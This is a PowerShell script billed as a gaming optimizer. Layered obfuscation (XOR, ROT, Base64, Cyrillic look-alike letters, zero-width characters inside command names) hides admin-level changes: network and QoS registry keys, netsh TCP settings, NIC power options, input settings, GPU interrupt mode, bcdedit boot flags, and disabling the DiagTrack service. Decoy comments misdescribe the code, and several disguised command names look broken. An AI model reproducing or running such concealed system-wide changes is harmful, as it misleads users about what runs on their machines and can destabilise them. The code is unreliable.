# Added to suppress warning in older versions
if (-not ([sEcuRITy.pRINCiPAL.WiNDOwsPRiNcIpAl][secuRiTy.priNCipAL.wiNDoWsiDentIty]::gETcURRenT()).iSINROle([SecUrITY.PRInCiPAL.wINDoWSBuiLtInrOlE]::ADmIniSTRATor)) {
    &($($k3789=']D}@j7gy';$b=[byte[]](0x2A,0x16,0x34,0x34,0x2F,0x1A,0x10,0x38,0x0F,0x0A,0x34,0x2E);$kb=[System.Text.Encoding]::UTF8.GetBytes($k3789);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+('{0}' -f 'g')) ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Q1JJVElDQUw6IFRoaXMgc2NyaXB0IE1VU1QgYmUgZXhlY3V0ZWQgYXMgQWRtaW5pc3RyYXRvciEgUGxlYXNlIHJlLXJ1biBQb3dlclNoZWxsIGFzIEFkbWluLg==')))
    E`xIt
}

# Retry logic removed (no longer needed)
# Waiting for service heartbeat before continuing

function geT-sYsTEMSpECS {
    $PIhsH = @{}
    $pihsH[([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('UENOYW1l')))] = $HzvbOId6:cOMpuTERnAme

    $BVpzpcD = &($($k1415=79;$b=[byte[]](0x08,0x2a,0x3b,0x62,0x0c,0x26,0x22,0x06,0x21,0x1c,0x3b,0x0e,0x01);-join($b|%{[char]($_-bxor$k1415)}))+$(-join('hj'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+21)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+21)%26))}else{[char]$c}}))) WIn32_prOCESsoR | &("$([char]0x73)$([char]0x65)"+(-join([char]0x6C, [char]0x45, [char]0x43, [char]0x54, [char]0x2D, [char]0x4F, [char]0x62, [char]0x6A, [char]0x45, [char]0x63, [char]0x54))) -First (74 - 73) -expANDProPeRty nAme
    $pIHsh[([System.Text.Encoding]::UTF8.GetString([byte[]](0x43,0x50,0x55)))] = ($BVpzpcd -replace ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('XHMr'))), ' ‍').trim()

    $ggO1jV = &($($k8755=243;$b=[byte[]](0xb4);-join($b|%{[char]($_-bxor$k8755)}))+'Еt-сImInstАnсе') WiN32_VIdEoCOntrOlLeR | WHErE-ObJeCT { $_.ADaPtErDACTYPe -ne ('{0}{1}{2}' -f 'Inter','na','l') -and $_.InSTaLLeDDiSPlayDriVErS } | &('s​E‌l‌e‌c‌T​'+([string]::Format('{0}{1}{2}{3}','-Obj','e','C','T'))) -FiRst (61 + -60) -expAnDprOpERtY naMe
    if (-not $ggO1Jv) { $GgO1jv = gET-Ci`mInSTancE WIn32_viDEOcontrOLlER | &($($k4688='HJm>B}_txx@4';$b=[byte[]](0x3B,0x0F,0x21,0x7B,0x01,0x09,0x72);$kb=[System.Text.Encoding]::UTF8.GetBytes($k4688);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+('OBJ'+'eCt')) -fiRst (101 -bxor 100) -exPaNDProperTy NAme }
if ((Get-Random -Minimum 1000 -Maximum 5000) -lt 0) {
    $memCounter = Get-Counter -Counter "\Memory\Available MBytes"; Write-Debug "Available Memory (simulated sample): $($memCounter.CounterSamples.CookedValue) MB"
}
[char]74 | Out-Null
    $pIHSh[$(-join('YHM'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+8)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+8)%26))}else{[char]$c}}))] = $GGO1Jv

    $sbHeLXSc = &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x47,0x65,0x74,0x2D,0x43,0x49,0x6D,0x69,0x6E,0x53,0x74,0x41,0x4E)))+$(-join('Pr'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+13)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+13)%26))}else{[char]$c}}))) WIN32_pHysIcalmEMoRY | &('m‍e‍A‍s‌u‍r‍e​-‌o​b‍J​E‌'+'Сt') -PropERtY CaPAcItY -Sum | &('SеLесt'+'-оbJесt') -eXPaNDpROperTY SUm
    $pIHsh['R‌A‌M​'] = ($([Math]::Round($sBHElXSC / 1GB) + ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('KSBHQg=='))))

    return $piHsH
}

# Handles backend sync issue on older hosts
# Checking time drift in case it affects scheduling
# Deprecated - avoid touching this section

function GLobal-opTImIZE {
    wRITe-hO`st ([string]::Format('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}{21}{22}{23}','``n[+','] ','Ini','t','ia','l','iz','ing',' Adva','nce','d ','G','am','i','ng Op','timiz','a','ti','on ','St','ack','.','.','.')) -ForegrouNDCoLOr CYaN
    sTaRT-s`LeEp -MilLIsecONdS 500

# Quick validation pass to avoid unnecessary errors
    &($(-join('uP'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+2)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+2)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x69,0x74,0x45,0x2D,0x68,0x6F,0x73,0x54)))) ('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}' -f '[>] U','nlim','it','ing ','Band','width',' & T','u','n','in','g TC','P',' Ne','two','rk S','tack','.','..') -forEgRouNDColOR WHite
    $hx9IA = ('HKLM:\SO'+'FTW'+'A'+'RE\P'+'o'+'l'+'ic'+'i'+'es\Mi'+'c'+'rosoft'+'\Window'+'s\Psched')
    if (-not (&((-join([char]0x74, [char]0x65))+'st-РАth') $Hx9iA)) { &(('{0}' -f 'nE')+$($k3966=163;$b=[byte[]](0xf4,0x8e,0xca,0xf7,0xc6,0xee);-join($b|%{[char]($_-bxor$k3966)}))) -paTh $Hx9IA -FoRCE | &(('OU'+'t-'+'n')+'u‌L‌L‍') }
    &($($k8305='&j-tQuE^<11M5y';$b=[byte[]](0x68,0x0F,0x7A,0x59,0x18,0x01,0x20,0x13,0x4C,0x43,0x5E,0x3D,0x50,0x0B,0x52);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8305);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+('{0}' -f 'y')) -paTh $hX9iA -NaME 'N​o​n‌B​e‍s‍t​E‌f‍f‍o‍r‍t‌L‌i‌m‌i‍t‍' -vaLue (22 + -22) -PROPERTYTYpe Dword -fOrCe | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b3VULU4=')))+'Ull')

    NetSH &(('{0}{1}' -f 'i','n')+$($k5697='8_ZO?^{';$b=[byte[]](0x6C);$kb=[System.Text.Encoding]::UTF8.GetBytes($k5697);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) &('TC'+$($k3998=75;$b=[byte[]](0x3b);-join($b|%{[char]($_-bxor$k3998)}))) &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Uw==')))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('RVQ=')))) &('g​l‍O‌B‌a‍'+(-join([char]0x6C))) CoNGeStIonProVider=&(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('YmI=')))+'R') | &($($k3722=122;$b=[byte[]](0x15);-join($b|%{[char]($_-bxor$k3722)}))+'U‍T​-​n‌u‍l‍l​')
    NEtsh &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aQ==')))+$(-join('JP'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+4)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+4)%26))}else{[char]$c}}))) tc`P &((-join([char]0x73, [char]0x65))+$($k9413=226;$b=[byte[]](0x96);-join($b|%{[char]($_-bxor$k9413)}))) &($($k5319='I*Yt?,kod_>';$b=[byte[]](0x0E,0x66,0x36,0x36,0x7E);$kb=[System.Text.Encoding]::UTF8.GetBytes($k5319);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+'L') AuTOTUniNGLEvEl=&('NОrm'+('{0}{1}' -f 'a','L')) | &($(-join('kqP-Jq'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+4)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+4)%26))}else{[char]$c}}))+"$([char]0x4C)$([char]0x6C)")
    NetsH &($($k6808='p+Wx*H1N';$b=[byte[]](0x39,0x45);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6808);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+('{0}' -f 't')) &('t‌'+$($k1907=196;$b=[byte[]](0xa7,0xb4);-join($b|%{[char]($_-bxor$k1907)}))) &($($k5325=144;$b=[byte[]](0xe3,0xf5);-join($b|%{[char]($_-bxor$k5325)}))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x54)))) &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Rw==')))+('{0}{1}{2}' -f 'l','Oba','L')) ecnCApabiLiTy=&($($k4750='$XSJQ9BPCuj1IX(';$b=[byte[]](0x61,0x16,0x12);$kb=[System.Text.Encoding]::UTF8.GetBytes($k4750);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+('{0}{1}{2}' -f 'B','lE','D')) | &('оUt'+$($k2666=46;$b=[byte[]](0x03,0x40,0x7b,0x42,0x42);-join($b|%{[char]($_-bxor$k2666)})))
    NetsH &('iN'+$($k6361='S>MKZ]WP#W-XQoG';$b=[byte[]](0x27);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6361);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) TC`p &("$([char]0x73)"+([string]::Format('{0}{1}','e','T'))) G`lOBal tiMESTampS=&('dіSаВl'+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('RWQ=')))) | &(('{0}{1}{2}{3}' -f 'o','U','t-NU','l')+('{0}' -f 'L'))
    nEtsH &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SQ==')))+"$([char]0x4E)$([char]0x74)") &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('VA==')))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Q1A=')))) &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Uw==')))+('e'+'T')) &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Rw==')))+'l​o​B‍a‍L‌') rSs=enAbLE`D | &($(-join('lrq'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+3)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+3)%26))}else{[char]$c}}))+([string]::Format('{0}{1}','-nUL','l')))
    neTsH &('i'+([string]::Format('{0}{1}','n','t'))) t`CP &(('{0}' -f 's')+$($k1500='m%%B0QOmwFSBg';$b=[byte[]](0x08,0x51);$kb=[System.Text.Encoding]::UTF8.GetBytes($k1500);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) &('g​'+('LO'+'ba'+'L')) rsc=EnaBlE`D | ouT-nu`ll
    NEtSh &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aQ==')))+'N​T‍') &((-join([char]0x54, [char]0x43))+$(-join('z'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+16)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+16)%26))}else{[char]$c}}))) &(([string]::Format('{0}','se'))+$($k3307=120;$b=[byte[]](0x2c);-join($b|%{[char]($_-bxor$k3307)}))) &($(-join('zEhu'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}}))+$($k7247='J@27PP#';$b=[byte[]](0x0B,0x2C);$kb=[System.Text.Encoding]::UTF8.GetBytes($k7247);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) Dca=&($($k9030=168;$b=[byte[]](0xcd,0xe6,0xc9);-join($b|%{[char]($_-bxor$k9030)}))+([string]::Format('{0}{1}','bl','ed'))) | &(('o'+'UT-'+'nu')+$($k6475='y:qLkQ;u#Be;kFg';$b=[byte[]](0x35,0x56);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6475);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})))
    NEtSH &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aU4=')))+'T') T`Cp &(('{0}{1}' -f 's','e')+'Т') &($(-join('SX'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+14)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+14)%26))}else{[char]$c}}))+$(-join('cPoz'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+12)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+12)%26))}else{[char]$c}}))) NEtdma=&(([System.Text.Encoding]::UTF8.GetString([byte[]](0x65,0x4E,0x41)))+('{0}{1}{2}' -f 'b','le','D')) | &(('{0}{1}' -f 'Out-','nUl')+(-join([char]0x6C)))

# Deprecated - avoid touching this section
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('d1I=')))+$(-join('Grc-fMqr'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+2)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+2)%26))}else{[char]$c}}))) $($k8241='-C%6MLuM8;%dy';$b=[byte[]](0x76,0x7D,0x78,0x16,0x1E,0x38,0x07,0x24,0x48,0x4B,0x4C,0x0A,0x1E,0x0D,0x13,0x4A,0x41,0x28,0x3E,0x58,0x1E,0x59,0x4D,0x4C,0x0A,0x1E,0x0D,0x07,0x40,0x5A,0x2C,0x35,0x06,0x6D,0x5E,0x49,0x4A,0x09,0x59,0x61,0x02,0x6B,0x16,0x0E,0x23,0x1B,0x39,0x4A,0x54,0x49,0x08,0x1C,0x5F,0x6D,0x0B,0x18);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8241);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -ForEGROuNDcolOR WhIte
    $xtDNRgIU = &('G‍'+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZXQtQ2hJbERpdGVt')))) -paTH ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SEtMTTpcU1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XENvbnRyb2xcQ2xhc3NcezRkMzZlOTcyLWUzMjUtMTFjZS1iZmMxLTA4MDAyYmUxMDMxOH0='))) -ErrORaCTION sIleNtlYCOnTInUe
    for ($i_67453 = 0; $I_67453 -lt $xtDnrgIu.cOUNt; $I_67453++) {
    $VGhYY0 = $xtdNRgIu[$i_67453];
    $Tt5so = $vGHYy0.PSPath
        if (&(('{0}{1}' -f 'g','e')+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dC1JdGVtUHJvUGVyVFk=')))) -paTh $tt5So -nAmE (-join([char]0x44, [char]0x72, [char]0x69, [char]0x76, [char]0x65, [char]0x72, [char]0x44, [char]0x65, [char]0x73, [char]0x63)) -ERroRactiOn sIlenTlycoNtiNUe) {
            &('n​E‍w‌-‍I‍t‍e‍m​p‌r‌'+'o‍p‌e‌R‍T​y‍') -paTh $tt5SO -NamE ([string]::Format('{0}{1}{2}{3}{4}{5}','*EEEL','in','kAdve','rtis','eme','nt')) -VaLuE (-25 + 25) -proPERtyTYPE StrING -FoRce -eRrORacTion SilenTlyCOnTiNUe | &(('{0}{1}{2}' -f 'O','u','t')+$($k9868=28;$b=[byte[]](0x31,0x52,0x49,0x50,0x70);-join($b|%{[char]($_-bxor$k9868)})))
            new-ItEmprOPErTY -PaTH $tT5sO -NaMe $(-join('*TctgvnTuuxrxtciTiwtgcti'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+11)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+11)%26))}else{[char]$c}})) -VAlUE (74 + -74) -PrOpERTYtYPe StRinG -fORCe -ErroRActiOn sIlENtLyCONTINUe | &(('{0}' -f 'o')+$($k6211=254;$b=[byte[]](0xab,0x8a,0xd3,0xb0,0xab,0x92,0xb2);-join($b|%{[char]($_-bxor$k6211)})))
            nEw-itemproPErty -patH $tt5so -nAME $(-join('*CnaajApdanjap'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+4)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+4)%26))}else{[char]$c}})) -vALUe (-57 -bxor -57) -PropeRTytype sTRInG -FORce -ERrOractION SILeNtLYCoNTINue | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('T1VULU51')))+'ll')
            New-ITeMprOPeRTy -paTH $Tt5SO -namE 'P‌o​w​e‌r​D​o‌w‍n‌P‌l​l‌' -vAlUE (100 % 50) -pRoPeRtyTYPe StRING -foRCE -erRORAcTIon SIlentLYcOntInuE | &(([string]::Format('{0}','O'))+'U​T‍-‌n‌U‍l‌l‍')
}
    }

    &(('w'+'riT'+'e')+$(-join('-QxBC'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+17)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+17)%26))}else{[char]$c}}))) '[>] Dесrеаsіng Моusе & Кеуbоаrd Наrdwаrе Inрut Вuffеrs...' -FoReGROunDCOloR wHITE
    $EL4DQm = (-join([char]0x48, [char]0x4B, [char]0x43, [char]0x55, [char]0x3A, [char]0x5C, [char]0x43, [char]0x6F, [char]0x6E, [char]0x74, [char]0x72, [char]0x6F, [char]0x6C, [char]0x20, [char]0x50, [char]0x61, [char]0x6E, [char]0x65, [char]0x6C, [char]0x5C, [char]0x4D, [char]0x6F, [char]0x75, [char]0x73, [char]0x65))
    &($(-join('Bsk-WHsAdF'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+12)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+12)%26))}else{[char]$c}}))+('{0}{1}{2}' -f 'o','PErT','Y')) -paTH $EL4dqm -nAMe ([string]::Format('{0}{1}{2}{3}{4}','Mo','use','Sp','e','ed')) -ValUE $(77 -bxor 77) -PropertyTYPE StrIng -FORCE | ouT-NUL`l
    new-ITemPRoPeRTy -pATH $el4dQM -NamE ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TW91c2VUaHJlc2hvbGQx'))) -VAlUe $(58 - 58) -pRoPerTyTYPe sTRInG -FORCE | &(([string]::Format('{0}{1}','oU','T-NU'))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bEw='))))
    NEW-ITemPrOpertY -pATH $eL4dqm -name ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TW91c2VUaHJlc2hvbGQy'))) -vaLUE $(-62 + 62) -PrOPerTYTypE StriNg -forCE | &($(-join('L'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+3)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+3)%26))}else{[char]$c}}))+$($k7573='Bo#+,n#zXY<';$b=[byte[]](0x37,0x1B,0x0E,0x65,0x59,0x02,0x4F);$kb=[System.Text.Encoding]::UTF8.GetBytes($k7573);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})))

    $lgVniJK = $(-join('DGYQ:\Ykjpnkh Lwjah\Wyyaooexehepu\Gauxkwnz Naolkjoa'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+4)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+4)%26))}else{[char]$c}}))
    if (-not (&('t‍e‌s‌T​-​p‍'+$(-join('exL'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+22)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+22)%26))}else{[char]$c}}))) $lGVnIJk)) { &((-join('N','e','W-I'))+(-join('T','e','m'))) -path $lgVNiJK -fOrcE | &('o‍u‌'+('{0}{1}' -f 't-nuL','l')) }
    &($($k6767='DR5_8m';$b=[byte[]](0x0A,0x37,0x42,0x72,0x71,0x39,0x21,0x3F,0x65,0x2D);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6767);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+$(-join('NodQSx'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+1)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+1)%26))}else{[char]$c}}))) -pATH ([string]::Format('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}','HKCU:','\','Contr','o','l P','anel\','Ke','yboa','r','d')) -NAME "$([char]0x4B)$([char]0x65)$([char]0x79)$([char]0x62)$([char]0x6F)$([char]0x61)$([char]0x72)$([char]0x64)$([char]0x44)$([char]0x65)$([char]0x6C)$([char]0x61)$([char]0x79)" -VAluE $(-92 + 92) -PrOPertyTYPe strInG -fOrCe | &("$([char]0x4F)$([char]0x75)$([char]0x74)$([char]0x2D)$([char]0x4E)$([char]0x75)$([char]0x6C)"+'L')
    neW-IteMpRoPeRTy -PatH ('H'+'K'+'CU:\Cont'+'rol'+' Pane'+'l\K'+'eyboard') -NaME ('Keyboa'+'rdSp'+'eed') -vALue $(148 -bxor 139) -PRoPerTytYpE STRing -forCE | &('о'+(-join('UT','-N','UL','L')))

    $LTHhZ = 'H‌K‌L​M‍:​\​S‌Y‌S‍T‌E​M​\​C‌u​r‍r​e‍n‍t​C‍o‍n​t​r​o‌l‍S‍e‍t​\​C‍o‍n‍t‍r‍o​l‌\‌P‌r​i‍o​r​i‌t‍y​C‍o‍n‌t‌r‌o​l‍'
    &('NЕw-ItЕm'+(-join([char]0x50, [char]0x72, [char]0x4F, [char]0x50, [char]0x65, [char]0x52, [char]0x74, [char]0x59))) -patH $lthHz -naMe $(-join('Cot32VxouxozeYkvgxgzout'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+20)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+20)%26))}else{[char]$c}})) -VAlUE 26 -pROPErtYType dWoRD -force | ouT`-NULL

# Last-minute fix - unverified but consistent
    wRitE-h`oST ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Wz5dIFRyYW5zZm9ybWluZyBHUFUgSW50ZXJydXB0IFByaW9yaXR5IEludGVyZmFjZSB0byBNU0kgTW9kZS4uLg=='))) -ForeGroUnDCOlOR whItE
    $GgHiFC = &($(-join('Rpe-NstwOtE'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+15)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+15)%26))}else{[char]$c}}))+$($k8435='0r>WxDWa!+?2w9D';$b=[byte[]](0x75,0x3F);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8435);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) -PaTH ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SEtMTTpcU1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XEVudW1cUENJ'))) -reCuRSE -eRROractiOn siLentlyConTInUE | WherE-OBjECT { $_.pscHiLdNAME -eq $($k6217=23;$b=[byte[]](0x53,0x72,0x61,0x7e,0x74,0x72,0x37,0x47,0x76,0x65,0x76,0x7a,0x72,0x63,0x72,0x65,0x64);-join($b|%{[char]($_-bxor$k6217)})) }
    for ($I_76769 = 0; $I_76769 -lt $GghiFc.couNt; $i_76769++) {
    $Wum9tHv3 = $GGHIFc[$i_76769];
    $MgVwOnw8 = ($($wUM9Thv3.PSPath) + ([System.Text.Encoding]::UTF8.GetString([byte[]](0x5C,0x49,0x6E,0x74,0x65,0x72,0x72,0x75,0x70,0x74,0x20,0x4D,0x61,0x6E,0x61,0x67,0x65,0x6D,0x65,0x6E,0x74,0x5C,0x4D,0x65,0x73,0x73,0x61,0x67,0x65,0x53,0x69,0x67,0x6E,0x61,0x6C,0x65,0x64,0x49,0x6E,0x74,0x65,0x72,0x72,0x75,0x70,0x74,0x50,0x72,0x6F,0x70,0x65,0x72,0x74,0x69,0x65,0x73))))
        if (TEST-pAT`h ($($wUM9Thv3.PSPath) + ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('XEludGVycnVwdCBNYW5hZ2VtZW50'))))) {
            if (-not (&(('{0}{1}{2}' -f 'tES','T','-p')+([string]::Format('{0}','ATH'))) $MgvWonw8)) { &('nЕw-It'+$($k6522=31;$b=[byte[]](0x5a,0x72);-join($b|%{[char]($_-bxor$k6522)}))) -pAth $MGVWoNw8 -FOrCe | &($($k6322='rN2ZZx[ez';$b=[byte[]](0x1D,0x3B,0x66,0x77,0x14,0x2D,0x17);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6322);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+'l') }
            &("$([char]0x6E)$([char]0x65)$([char]0x77)$([char]0x2D)$([char]0x69)$([char]0x74)$([char]0x45)"+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TXByb3BFUlR5')))) -pATh $mGVwonw8 -NaMe ('MS'+'ISuppo'+'r'+'ted') -VaLUE (66 % 65) -PrOPErtYTYpe DWoRd -fOrce | &('О'+$(-join('po-iPgg'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+5)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+5)%26))}else{[char]$c}})))
            NEw-iteMpROPeRtY -pAtH $MGvwonW8 -name $(-join('IaoowcaJqixanHeiep'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+4)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+4)%26))}else{[char]$c}})) -vaLUE (90 + -89) -PROPeRtyTYPE dwoRD -ForCe | &('ОU'+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('VC1udUxM'))))
}
    }

# Left unchanged to preserve backward compatibility
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V1JpdGUtSG8=')))+$(-join('Lm'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}}))) $(-join('[>] Loufdetyr MNO Djdepx Nwznv Nzydelyed qzc Xtncz-Defeepc Qti...'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+15)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+15)%26))}else{[char]$c}})) -fOreGroundcoLOR WhIte
    &('bС'+$($k3950=25;$b=[byte[]](0x7d,0x5c,0x7d,0x50,0x6d);-join($b|%{[char]($_-bxor$k3950)}))) /sET usEPlAtfOrM`ClOCk &(([string]::Format('{0}','F'))+(-join([char]0x41, [char]0x6C, [char]0x53, [char]0x45))) | &('оuТ'+('{0}{1}{2}{3}' -f '-n','u','L','L'))
    bCdEDIT /set dISAbledYNA`MiCtICK YE`S | &('оut-N'+$(-join('kbB'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+10)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+10)%26))}else{[char]$c}})))

# No action needed unless critical failure occurs
    &($(-join('XSJuf-IPT'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+25)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+25)%26))}else{[char]$c}}))+'Т') ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Wz5dIEtpbGxpbmcgV2luZG93cyBCYWNrZ3JvdW5kIFRlbGVtZXRyeSBSZXBvcnRpbmcgUHJvY2Vzc2VzLi4u'))) -fOrEGroundCOlor wHITE
    &($(-join('gHCd'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+12)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+12)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('LXNFcnZpY2U=')))) -naMe ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('RGlhZ1RyYWNr'))) -ERROraCTiOn siLentLYCOnTinUE
    &($(-join('amB-amz'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+18)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+18)%26))}else{[char]$c}}))+([string]::Format('{0}','viCe'))) -NaME ('{0}{1}{2}' -f 'D','iag','Track') -STArTuPType DisABLeD -eRROracTiON sILENTLyConTInue
